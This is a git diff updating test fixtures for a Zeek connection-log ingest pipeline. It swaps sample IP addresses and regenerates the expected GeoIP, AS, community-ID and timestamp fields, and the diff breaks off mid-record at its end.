{"ts":1617062390.563442,"uid":"CKSr3w18mmW6t7bXC4","id.orig_h":"10.156.0.2","id.orig_p":40080,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","service":"dns","duration":0.025056123733520509,"orig_bytes":0,"resp_bytes":276,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Cd","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":1,"resp_ip_bytes":304} {"ts":1617062390.667048,"uid":"CGUiHy4kLIF2ml95eg","id.orig_h":"10.156.0.2","id.orig_p":41407,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","service":"dns","duration":0.003319978713989258,"orig_bytes":0,"resp_bytes":133,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Cd","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":1,"resp_ip_bytes":161} @@ -14,5 +14,5 @@ {"ts":1617062400.703865,"uid":"C3pPjh1YRYcVDiZD3","id.orig_h":"10.156.0.2","id.orig_p":44944,"id.resp_h":"169.254.169.254","id.resp_p":80,"proto":"tcp","conn_state":"OTH","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"C","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":0,"resp_ip_bytes":0} {"ts":1617062400.703851,"uid":"ChUxTmYLG37oO5qUb","id.orig_h":"10.156.0.2","id.orig_p":44942,"id.resp_h":"169.254.169.254","id.resp_p":80,"proto":"tcp","conn_state":"OTH","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"C","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":0,"resp_ip_bytes":0} {"ts":1617062400.704467,"uid":"CpeAOT3B11CTXJgzw2","id.orig_h":"10.156.0.2","id.orig_p":44946,"id.resp_h":"169.254.169.254","id.resp_p":80,"proto":"tcp","conn_state":"OTH","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"C","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":0,"resp_ip_bytes":0} -{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1547188417.857497,\"uid\":\"CAcJw21BbVedgFnYH5\",\"id.orig_h\":\"4.4.2.2\",\"id.orig_p\":38334,\"id.resp_h\":\"8.8.8.8\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.076967,\"orig_bytes\":75,\"resp_bytes\":178,\"conn_state\":\"SF\",\"local_orig\":false,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Dd\",\"orig_pkts\":1,\"orig_ip_bytes\":103,\"resp_pkts\":1,\"resp_ip_bytes\":206,\"tunnel_parents\":[]}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/httpd/access_log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} -{"ts":"2021-06-09T20:55:13.160328Z","uid":"C2KP1V3alRLoxl4JB9","id.orig_h":"10.0.2.15","id.orig_p":46408,"id.resp_h":"172.217.9.68","id.resp_p":80,"proto":"tcp","conn_state":"OTH","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"C","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":0,"resp_ip_bytes":0} \ No newline at end of file +{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1547188417.857497,\"uid\":\"CAcJw21BbVedgFnYH5\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":38334,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.076967,\"orig_bytes\":75,\"resp_bytes\":178,\"conn_state\":\"SF\",\"local_orig\":false,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Dd\",\"orig_pkts\":1,\"orig_ip_bytes\":103,\"resp_pkts\":1,\"resp_ip_bytes\":206,\"tunnel_parents\":[]}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/httpd/access_log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} +{"ts":"2021-06-09T20:55:13.160328Z","uid":"C2KP1V3alRLoxl4JB9","id.orig_h":"10.0.2.15","id.orig_p":46408,"id.resp_h":"172.16.9.68","id.resp_p":80,"proto":"tcp","conn_state":"OTH","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"C","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":0,"resp_ip_bytes":0} \ No newline at end of file diff --git a/packages/zeek/data_stream/connection/_dev/test/pipeline/test-conn.log-expected.json b/packages/zeek/data_stream/connection/_dev/test/pipeline/test-conn.log-expected.json index 1195f70d968..90dda5010a4 100644 --- a/packages/zeek/data_stream/connection/_dev/test/pipeline/test-conn.log-expected.json +++ b/packages/zeek/data_stream/connection/_dev/test/pipeline/test-conn.log-expected.json @@ -38,7 +38,7 @@ }, "event": { "duration": 76967000, - "ingested": "2021-08-26T12:37:08.253067515Z", + "ingested": "2021-12-09T13:50:56.388703500Z", "original": "{\"ts\":1547188415.857497,\"uid\":\"CAcJw21BbVedgFnYH3\",\"id.orig_h\":\"192.168.86.167\",\"id.orig_p\":38339,\"id.resp_h\":\"192.168.86.1\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.076967,\"orig_bytes\":75,\"resp_bytes\":178,\"conn_state\":\"SF\",\"local_orig\":true,\"local_resp\":true,\"missed_bytes\":0,\"history\":\"Dd\",\"orig_pkts\":1,\"orig_ip_bytes\":103,\"resp_pkts\":1,\"resp_ip_bytes\":206,\"tunnel_parents\":[]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -72,29 +72,32 @@ "related": { "ip": [ "192.168.86.167", - "8.8.8.8" + "89.160.20.156" ] }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "8.8.8.8", + "address": "89.160.20.156", "port": 53, "bytes": 206, - "ip": "8.8.8.8", + "ip": "89.160.20.156", "packets": 1 }, "zeek": { @@ -117,8 +120,8 @@ }, "event": { "duration": 76967000, - "ingested": "2021-08-26T12:37:08.253113730Z", - "original": "{\"ts\":1547188416.857497,\"uid\":\"CAcJw21BbVedgFnYH4\",\"id.orig_h\":\"192.168.86.167\",\"id.orig_p\":38340,\"id.resp_h\":\"8.8.8.8\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.076967,\"orig_bytes\":75,\"resp_bytes\":178,\"conn_state\":\"SF\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Dd\",\"orig_pkts\":1,\"orig_ip_bytes\":103,\"resp_pkts\":1,\"resp_ip_bytes\":206,\"tunnel_parents\":[]}", + "ingested": "2021-12-09T13:50:56.388712400Z", + "original": "{\"ts\":1547188416.857497,\"uid\":\"CAcJw21BbVedgFnYH4\",\"id.orig_h\":\"192.168.86.167\",\"id.orig_p\":38340,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.076967,\"orig_bytes\":75,\"resp_bytes\":178,\"conn_state\":\"SF\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Dd\",\"orig_pkts\":1,\"orig_ip_bytes\":103,\"resp_pkts\":1,\"resp_ip_bytes\":206,\"tunnel_parents\":[]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CAcJw21BbVedgFnYH4", @@ -136,7 +139,7 @@ ], "network": { "protocol": "dns", - "community_id": "1:77KJyeznYjdDxCSKdZhW89aAaBI=", + "community_id": "1:/gtb8GnyAm+VWWDzXIdu6DL11Ao=", "transport": "udp", "bytes": 309, "packets": 2, @@ -150,30 +153,32 @@ }, "related": { "ip": [ - "4.4.2.2", - "8.8.8.8" + "89.160.20.156" ] }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "8.8.8.8", + "address": "89.160.20.156", "port": 53, "bytes": 206, - "ip": "8.8.8.8", + "ip": "89.160.20.156", "packets": 1 }, "zeek": { @@ -189,30 +194,33 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 3356, + "number": 29518, "organization": { - "name": "Level 3 Parent, LLC" + "name": "Bredband2 AB" } }, - "address": "4.4.2.2", + "address": "89.160.20.156", "port": 38334, "bytes": 103, - "ip": "4.4.2.2", + "ip": "89.160.20.156", "packets": 1 }, "event": { "duration": 76967000, - "ingested": "2021-08-26T12:37:08.253137894Z", - "original": "{\"ts\":1547188417.857497,\"uid\":\"CAcJw21BbVedgFnYH5\",\"id.orig_h\":\"4.4.2.2\",\"id.orig_p\":38334,\"id.resp_h\":\"8.8.8.8\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.076967,\"orig_bytes\":75,\"resp_bytes\":178,\"conn_state\":\"SF\",\"local_orig\":false,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Dd\",\"orig_pkts\":1,\"orig_ip_bytes\":103,\"resp_pkts\":1,\"resp_ip_bytes\":206,\"tunnel_parents\":[]}", + "ingested": "2021-12-09T13:50:56.388718400Z", + "original": "{\"ts\":1547188417.857497,\"uid\":\"CAcJw21BbVedgFnYH5\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":38334,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.076967,\"orig_bytes\":75,\"resp_bytes\":178,\"conn_state\":\"SF\",\"local_orig\":false,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Dd\",\"orig_pkts\":1,\"orig_ip_bytes\":103,\"resp_pkts\":1,\"resp_ip_bytes\":206,\"tunnel_parents\":[]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CAcJw21BbVedgFnYH5", @@ -230,7 +238,7 @@ ], "network": { "protocol": "dns", - "community_id": "1:hWC6cnCoeyQehzquxJQU6Y3Wm3g=", + "community_id": "1:4cXkRTqm06ivkFYCdZrC+CqSISU=", "transport": "udp", "bytes": 309, "packets": 2, @@ -244,15 +252,33 @@ }, "related": { "ip": [ - "192.0.2.205", - "198.51.100.249" + "192.168.2.205", + "89.160.20.156" ] }, "destination": { - "address": "198.51.100.249", + "geo": { + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", + "location": { + "lon": 17.8167, + "lat": 59.2 + } + }, + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "address": "89.160.20.156", "bytes": 0, "packets": 0, - "ip": "198.51.100.249" + "ip": "89.160.20.156" }, "zeek": { "session_id": "Cc6NJ3GRlfjE44I3h", @@ -269,14 +295,14 @@ } }, "source": { - "address": "192.0.2.205", + "address": "192.168.2.205", "bytes": 107, "packets": 1, - "ip": "192.0.2.205" + "ip": "192.168.2.205" }, "event": { - "ingested": "2021-08-26T12:37:08.253152215Z", - "original": "{\"ts\":1551399000.57855,\"uid\":\"Cc6NJ3GRlfjE44I3h\",\"id.orig_h\":\"192.0.2.205\",\"id.orig_p\":3,\"id.resp_h\":\"198.51.100.249\",\"id.resp_p\":3,\"proto\":\"icmp\",\"conn_state\":\"OTH\",\"local_orig\":false,\"local_resp\":false,\"missed_bytes\":0,\"orig_pkts\":1,\"orig_ip_bytes\":107,\"resp_pkts\":0,\"resp_ip_bytes\":0,\"tunnel_parents\":[]}", + "ingested": "2021-12-09T13:50:56.388724100Z", + "original": "{\"ts\":1551399000.57855,\"uid\":\"Cc6NJ3GRlfjE44I3h\",\"id.orig_h\":\"192.168.2.205\",\"id.orig_p\":3,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":3,\"proto\":\"icmp\",\"conn_state\":\"OTH\",\"local_orig\":false,\"local_resp\":false,\"missed_bytes\":0,\"orig_pkts\":1,\"orig_ip_bytes\":107,\"resp_pkts\":0,\"resp_ip_bytes\":0,\"tunnel_parents\":[]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "Cc6NJ3GRlfjE44I3h", @@ -292,7 +318,7 @@ "local_resp" ], "network": { - "community_id": "1:gzTID87+KHoT4RFDSqb5aInTPeg=", + "community_id": "1:/dM6GFGdrMSFfHWWVHXTte26ER4=", "transport": "icmp", "bytes": 107, "packets": 1, @@ -307,32 +333,32 @@ "related": { "ip": [ "10.156.0.2", - "46.101.87.151" + "89.160.20.156" ] }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -0.6658, - "lat": 51.5353 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 14061, + "number": 29518, "organization": { - "name": "DigitalOcean, LLC" + "name": "Bredband2 AB" } }, - "address": "46.101.87.151", + "address": "89.160.20.156", "port": 443, "bytes": 0, - "ip": "46.101.87.151", + "ip": "89.160.20.156", "packets": 0 }, "zeek": { @@ -354,8 +380,8 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-08-26T12:37:08.253166885Z", - "original": "{\"ts\":1617062400.404645,\"uid\":\"CCicIg43lOtCQOxXnb\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":56190,\"id.resp_h\":\"46.101.87.151\",\"id.resp_p\":443,\"proto\":\"tcp\",\"conn_state\":\"OTH\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"C\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":0,\"resp_ip_bytes\":0}", + "ingested": "2021-12-09T13:50:56.388729900Z", + "original": "{\"ts\":1617062400.404645,\"uid\":\"CCicIg43lOtCQOxXnb\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":56190,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":443,\"proto\":\"tcp\",\"conn_state\":\"OTH\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"C\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":0,\"resp_ip_bytes\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CCicIg43lOtCQOxXnb", @@ -371,7 +397,7 @@ "local_resp" ], "network": { - "community_id": "1:ziCfaAfpSmrkSIWraOMW2mxUmFc=", + "community_id": "1:H2WP+dwHKIuudV4sjhjnKf3fpGU=", "transport": "tcp", "bytes": 0, "packets": 0, @@ -386,32 +412,32 @@ "related": { "ip": [ "10.156.0.2", - "20.190.160.73" + "89.160.20.156" ] }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "NL-NH", - "city_name": "Amsterdam", - "country_iso_code": "NL", - "country_name": "Netherlands", - "region_name": "North Holland", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 4.9087, - "lat": 52.3534 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 8075, + "number": 29518, "organization": { - "name": "Microsoft Corporation" + "name": "Bredband2 AB" } }, - "address": "20.190.160.73", + "address": "89.160.20.156", "port": 443, "bytes": 267, - "ip": "20.190.160.73", + "ip": "89.160.20.156", "packets": 4 }, "zeek": { @@ -434,8 +460,8 @@ }, "event": { "duration": 103708982, - "ingested": "2021-08-26T12:37:08.253183090Z", - "original": "{\"ts\":1617062100.419397,\"uid\":\"C52mXBCPJ4pPGkhr1\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":60810,\"id.resp_h\":\"20.190.160.73\",\"id.resp_p\":443,\"proto\":\"tcp\",\"duration\":0.10370898246765137,\"orig_bytes\":0,\"resp_bytes\":5854,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"^hCcdafA\",\"orig_pkts\":1,\"orig_ip_bytes\":52,\"resp_pkts\":4,\"resp_ip_bytes\":267}", + "ingested": "2021-12-09T13:50:56.388735500Z", + "original": "{\"ts\":1617062100.419397,\"uid\":\"C52mXBCPJ4pPGkhr1\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":60810,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":443,\"proto\":\"tcp\",\"duration\":0.10370898246765137,\"orig_bytes\":0,\"resp_bytes\":5854,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"^hCcdafA\",\"orig_pkts\":1,\"orig_ip_bytes\":52,\"resp_pkts\":4,\"resp_ip_bytes\":267}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "C52mXBCPJ4pPGkhr1", @@ -451,7 +477,7 @@ "local_resp" ], "network": { - "community_id": "1:c8VbaUJYZDhCA0Us2hi3JYTahPI=", + "community_id": "1:nj/OEILzxKH8qUpmYiAisO39EXI=", "transport": "tcp", "bytes": 319, "packets": 5, @@ -466,32 +492,32 @@ "related": { "ip": [ "10.156.0.2", - "20.190.160.73" + "89.160.20.156" ] }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "NL-NH", - "city_name": "Amsterdam", - "country_iso_code": "NL", - "country_name": "Netherlands", - "region_name": "North Holland", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 4.9087, - "lat": 52.3534 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 8075, + "number": 29518, "organization": { - "name": "Microsoft Corporation" + "name": "Bredband2 AB" } }, - "address": "20.190.160.73", + "address": "89.160.20.156", "port": 443, "bytes": 267, - "ip": "20.190.160.73", + "ip": "89.160.20.156", "packets": 4 }, "zeek": { @@ -514,8 +540,8 @@ }, "event": { "duration": 104128838, - "ingested": "2021-08-26T12:37:08.253198430Z", - "original": "{\"ts\":1617062100.419603,\"uid\":\"CTzCky2CyLT5JJvHck\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":60804,\"id.resp_h\":\"20.190.160.73\",\"id.resp_p\":443,\"proto\":\"tcp\",\"duration\":0.10412883758544922,\"orig_bytes\":0,\"resp_bytes\":5854,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"^hCcdafA\",\"orig_pkts\":1,\"orig_ip_bytes\":52,\"resp_pkts\":4,\"resp_ip_bytes\":267}", + "ingested": "2021-12-09T13:50:56.388741200Z", + "original": "{\"ts\":1617062100.419603,\"uid\":\"CTzCky2CyLT5JJvHck\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":60804,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":443,\"proto\":\"tcp\",\"duration\":0.10412883758544922,\"orig_bytes\":0,\"resp_bytes\":5854,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"^hCcdafA\",\"orig_pkts\":1,\"orig_ip_bytes\":52,\"resp_pkts\":4,\"resp_ip_bytes\":267}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CTzCky2CyLT5JJvHck", @@ -531,7 +557,7 @@ "local_resp" ], "network": { - "community_id": "1:8EPi737PZXW0ZMOuEpsZ0CWS+UY=", + "community_id": "1:Sec7Dn4dO7T9XJjL+suQ90bQqNA=", "transport": "tcp", "bytes": 319, "packets": 5, @@ -546,32 +572,32 @@ "related": { "ip": [ "10.156.0.2", - "20.190.160.73" + "89.160.20.156" ] }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "NL-NH", - "city_name": "Amsterdam", - "country_iso_code": "NL", - "country_name": "Netherlands", - "region_name": "North Holland", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 4.9087, - "lat": 52.3534 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 8075, + "number": 29518, "organization": { - "name": "Microsoft Corporation" + "name": "Bredband2 AB" } }, - "address": "20.190.160.73", + "address": "89.160.20.156", "port": 443, "bytes": 267, - "ip": "20.190.160.73", + "ip": "89.160.20.156", "packets": 4 }, "zeek": { @@ -594,8 +620,8 @@ }, "event": { "duration": 104333878, - "ingested": "2021-08-26T12:37:08.253214584Z", - "original": "{\"ts\":1617062100.419826,\"uid\":\"CIkS28PDxqQnN49m2\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":60802,\"id.resp_h\":\"20.190.160.73\",\"id.resp_p\":443,\"proto\":\"tcp\",\"duration\":0.10433387756347656,\"orig_bytes\":0,\"resp_bytes\":5854,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"^hCcdafA\",\"orig_pkts\":1,\"orig_ip_bytes\":52,\"resp_pkts\":4,\"resp_ip_bytes\":267}", + "ingested": "2021-12-09T13:50:56.388746800Z", + "original": "{\"ts\":1617062100.419826,\"uid\":\"CIkS28PDxqQnN49m2\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":60802,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":443,\"proto\":\"tcp\",\"duration\":0.10433387756347656,\"orig_bytes\":0,\"resp_bytes\":5854,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"^hCcdafA\",\"orig_pkts\":1,\"orig_ip_bytes\":52,\"resp_pkts\":4,\"resp_ip_bytes\":267}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CIkS28PDxqQnN49m2", @@ -611,7 +637,7 @@ "local_resp" ], "network": { - "community_id": "1:D/bWvCWz34T0lAiafMBSMauT08c=", + "community_id": "1:NRiyq2lbQDqRyNJX78PZVf5DAbQ=", "transport": "tcp", "bytes": 319, "packets": 5, @@ -656,7 +682,7 @@ }, "event": { "duration": 26802063, - "ingested": "2021-08-26T12:37:08.253228176Z", + "ingested": "2021-12-09T13:50:56.388752500Z", "original": "{\"ts\":1617062390.563187,\"uid\":\"CezEGe4jeLNkayV976\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":38948,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.02680206298828125,\"orig_bytes\":0,\"resp_bytes\":241,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Cd\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":1,\"resp_ip_bytes\":269}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -719,7 +745,7 @@ }, "event": { "duration": 25056124, - "ingested": "2021-08-26T12:37:08.253241303Z", + "ingested": "2021-12-09T13:50:56.388758200Z", "original": "{\"ts\":1617062390.563442,\"uid\":\"CKSr3w18mmW6t7bXC4\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":40080,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.025056123733520509,\"orig_bytes\":0,\"resp_bytes\":276,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Cd\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":1,\"resp_ip_bytes\":304}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -782,7 +808,7 @@ }, "event": { "duration": 3319979, - "ingested": "2021-08-26T12:37:08.253258868Z", + "ingested": "2021-12-09T13:50:56.388762200Z", "original": "{\"ts\":1617062390.667048,\"uid\":\"CGUiHy4kLIF2ml95eg\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":41407,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.003319978713989258,\"orig_bytes\":0,\"resp_bytes\":133,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Cd\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":1,\"resp_ip_bytes\":161}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -845,7 +871,7 @@ }, "event": { "duration": 1111984, - "ingested": "2021-08-26T12:37:08.253273597Z", + "ingested": "2021-12-09T13:50:56.388767100Z", "original": "{\"ts\":1617062390.698943,\"uid\":\"CAOZZi4Qrio7gUVgVc\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":50487,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.0011119842529296876,\"orig_bytes\":0,\"resp_bytes\":202,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Cd\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":1,\"resp_ip_bytes\":230}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -908,7 +934,7 @@ }, "event": { "duration": 908852, - "ingested": "2021-08-26T12:37:08.253287095Z", + "ingested": "2021-12-09T13:50:56.388772200Z", "original": "{\"ts\":1617062390.699227,\"uid\":\"Chx5fs3xQ5ALB72i4e\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":49647,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.0009088516235351563,\"orig_bytes\":0,\"resp_bytes\":145,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Cd\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":1,\"resp_ip_bytes\":173}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -970,7 +996,7 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-08-26T12:37:08.253306054Z", + "ingested": "2021-12-09T13:50:56.388777Z", "original": "{\"ts\":1617062400.703865,\"uid\":\"C3pPjh1YRYcVDiZD3\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":44944,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":80,\"proto\":\"tcp\",\"conn_state\":\"OTH\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"C\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":0,\"resp_ip_bytes\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1031,7 +1057,7 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-08-26T12:37:08.253319736Z", + "ingested": "2021-12-09T13:50:56.388780800Z", "original": "{\"ts\":1617062400.703851,\"uid\":\"ChUxTmYLG37oO5qUb\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":44942,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":80,\"proto\":\"tcp\",\"conn_state\":\"OTH\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"C\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":0,\"resp_ip_bytes\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1092,7 +1118,7 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-08-26T12:37:08.253332989Z", + "ingested": "2021-12-09T13:50:56.388785300Z", "original": "{\"ts\":1617062400.704467,\"uid\":\"CpeAOT3B11CTXJgzw2\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":44946,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":80,\"proto\":\"tcp\",\"conn_state\":\"OTH\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"C\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":0,\"resp_ip_bytes\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1124,24 +1150,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 